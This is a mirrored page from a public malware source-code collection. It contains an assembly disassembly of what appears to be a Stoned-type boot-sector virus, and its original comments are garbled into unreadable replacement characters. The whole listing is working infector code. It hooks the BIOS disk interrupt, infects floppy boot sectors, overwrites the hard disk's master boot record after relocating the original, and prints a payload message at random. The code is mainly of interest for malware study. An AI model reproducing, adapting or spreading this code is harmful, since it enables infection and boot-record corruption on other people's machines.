mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
241 lines
5.6 KiB
NASM
241 lines
5.6 KiB
NASM
|
jmp far ptr loc_2 ;*(07C0:0005)
|
|||
|
jmp loc_8 ; (00A1)
|
|||
|
data_27 db 0
|
|||
|
data_28 dd 0F000EC59h
|
|||
|
data_29 dd 9F8000E4h
|
|||
|
data_30 dd 07C00h
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13h
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
push ds
|
|||
|
push ax
|
|||
|
cmp ah,2 ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><>-<2D><><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
jb loc_3 ; 2 <20><><EFBFBD> <20><>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
cmp ah,4 ; <20><> 4 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> INT 13h
|
|||
|
jae loc_3
|
|||
|
or dl,dl ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> A ?
|
|||
|
jnz loc_3
|
|||
|
xor ax,ax ; Zero register
|
|||
|
mov ds,ax
|
|||
|
mov al,byte ptr ds:[43Fh] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
test al,1 ; A <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jnz loc_3 ; Jump if not zero
|
|||
|
call sub_1 ; <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
loc_3:
|
|||
|
pop ax
|
|||
|
pop ds
|
|||
|
jmp cs:data_28 ; (6B8E:0009=0EC59h)
|
|||
|
|
|||
|

|
|||
|
; SUBROUTINE
|
|||
|

|
|||
|
|
|||
|
sub_1 proc near
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push es
|
|||
|
push si
|
|||
|
push di
|
|||
|
mov si,4
|
|||
|
loc_4:
|
|||
|
mov ax,201h
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov bx,200h
|
|||
|
xor cx,cx ; Zero register
|
|||
|
mov dx,cx
|
|||
|
inc cx
|
|||
|
pushf
|
|||
|
call cs:data_28 ; <20><><EFBFBD><EFBFBD> BOOT <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jnc loc_5 ; Jump if carry=0
|
|||
|
xor ax,ax ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pushf ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
call cs:data_28 ; (6B8E:0009=0EC59h)
|
|||
|
dec si
|
|||
|
jnz loc_4 ; <20><><EFBFBD><EFBFBD><EFBFBD> 4 <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jmp short loc_7 ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
nop
|
|||
|
loc_5:
|
|||
|
xor si,si ; Zero register
|
|||
|
mov di,200h
|
|||
|
cld ; Clear direction
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
lodsw ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
cmp ax,[di] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
jne loc_6
|
|||
|
lodsw
|
|||
|
cmp ax,[di+2]
|
|||
|
je loc_7 ; <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
loc_6:
|
|||
|
mov ax,301h
|
|||
|
mov bx,200h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
mov cl,3
|
|||
|
mov dh,1
|
|||
|
pushf
|
|||
|
call cs:data_28
|
|||
|
jc loc_7 ; Jump if carry Set
|
|||
|
mov ax,301h
|
|||
|
xor bx,bx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov cl,1
|
|||
|
xor dx,dx
|
|||
|
pushf
|
|||
|
call cs:data_28
|
|||
|
loc_7:
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop es ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
retn
|
|||
|
sub_1 endp
|
|||
|
|
|||
|
loc_8:
|
|||
|
xor ax,ax ; Zero register
|
|||
|
mov ds,ax
|
|||
|
cli ; Disable interrupts
|
|||
|
mov ss,ax
|
|||
|
mov sp,7C00h
|
|||
|
sti ;
|
|||
|
mov ax,word ptr ds:[4Ch] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> AX <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13H
|
|||
|
mov word ptr ds:[7C09h],ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 9h
|
|||
|
mov ax,word ptr ds:[4Eh] ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13H
|
|||
|
mov word ptr ds:[7C0Bh],ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Bh
|
|||
|
mov ax,word ptr ds:[413h] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> 1K
|
|||
|
dec ax
|
|||
|
dec ax
|
|||
|
mov word ptr ds:[413h],ax
|
|||
|
mov cl,6
|
|||
|
shl ax,cl
|
|||
|
mov es,ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ES <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov word ptr ds:[7C0Fh],ax ; <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ax,15h
|
|||
|
mov word ptr ds:[4Ch],ax ; INT 13H <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 15H <20><>
|
|||
|
mov word ptr ds:[4Eh],es ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
mov cx,1B8h
|
|||
|
push cs ;CS = 7C0h = DS
|
|||
|
pop ds
|
|||
|
xor si,si
|
|||
|
mov di,si
|
|||
|
cld
|
|||
|
rep movsb ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1B8h <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jmp cs:data_29 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ax,0
|
|||
|
int 13h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
xor ax,ax ; Zero register
|
|||
|
mov es,ax ; ES = AX = 00h
|
|||
|
mov ax,201h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
mov bx,7C00h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> BOOT
|
|||
|
cmp cs:data_27,0 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
je loc_9 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> Flopy disk
|
|||
|
mov cx,7
|
|||
|
mov dx,80h
|
|||
|
int 13h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
|
|||
|
jmp short loc_12 ; (014E)
|
|||
|
nop
|
|||
|
loc_9:
|
|||
|
mov cx,3
|
|||
|
mov dx,100h
|
|||
|
int 13h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
|
|||
|
jc loc_12 ; Jump if carry Set
|
|||
|
test byte ptr es:[46Ch],7 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|||
|
jnz loc_11 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov si,189h ;
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
loc_10:
|
|||
|
lodsb ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
or al,al
|
|||
|
jz loc_11 ; <20><><EFBFBD> <20><> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ah,0Eh
|
|||
|
mov bh,0
|
|||
|
int 10h ; Video display ah=functn 0Eh
|
|||
|
; write char al, teletype mode
|
|||
|
jmp short loc_10 ; (011D)
|
|||
|
loc_11:
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov ax,201h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
mov bx,200h ; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
mov cl,1 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 200h
|
|||
|
mov dx,80h
|
|||
|
int 13h ; Disk dl=drive #: ah=func a2h
|
|||
|
; read sectors to memory es:bx
|
|||
|
jc loc_12 ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ? -> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov si,200h
|
|||
|
mov di,0
|
|||
|
lodsw ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
cmp ax,[di] ; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jne loc_13 ; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
lodsw
|
|||
|
cmp ax,[di+2]
|
|||
|
jne loc_13
|
|||
|
loc_12:
|
|||
|
mov cs:data_27,0 ; (6B8E:0008=0)
|
|||
|
jmp cs:data_30 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
loc_13:
|
|||
|
mov cs:data_27,2 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
mov ax,301h
|
|||
|
mov bx,200h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 7
|
|||
|
mov cx,7 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
|
|||
|
jc loc_12 ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov si,3BEh ; <20><><EFBFBD><EFBFBD><EFBFBD> partition table
|
|||
|
mov di,1BEh
|
|||
|
mov cx,242h
|
|||
|
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
|
|||
|
mov ax,301h
|
|||
|
xor bx,bx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
inc cl
|
|||
|
int 13h ; Disk dl=drive #: ah=func a3h
|
|||
|
; write sectors from mem es:bx
|
|||
|
jmp short loc_12 ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
|
|||
|
|
|||
|
;------------------------------------------------------------------------------------------
|
|||
|
; <09><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;------------------------------------------------------------------------------------------
|
|||
|
|
|||
|
pop es
|
|||
|
pop cx
|
|||
|
db 6Fh
|
|||
|
jnz $+74h ; Jump if not zero
|
|||
|
and [bx+si+43h],dl
|
|||
|
and [bx+di+73h],ch
|
|||
|
and [bp+6Fh],ch
|
|||
|
ja $+22h ; Jump if above
|
|||
|
push bx
|
|||
|
jz $+71h ; Jump if zero
|
|||
|
db 6Eh
|
|||
|
db 65h
|
|||
|
db 64h
|
|||
|
and [bx],ax
|
|||
|
or ax,0A0Ah
|
|||
|
add [si+45h],cl
|
|||
|
inc di
|
|||
|
inc cx
|
|||
|
dec sp
|
|||
|
dec cx
|
|||
|
push bx
|
|||
|
inc bp
|
|||
|
xor al,[bx+di]
|
|||
|
add al,32h ; '2'
|
|||
|
add word ptr ds:[0B00h][bx+si],ax ; (6B7E:0B00=0)
|
|||
|
add ax,132h
|
|||
|
db 72 dup (0)
|
|||
|
|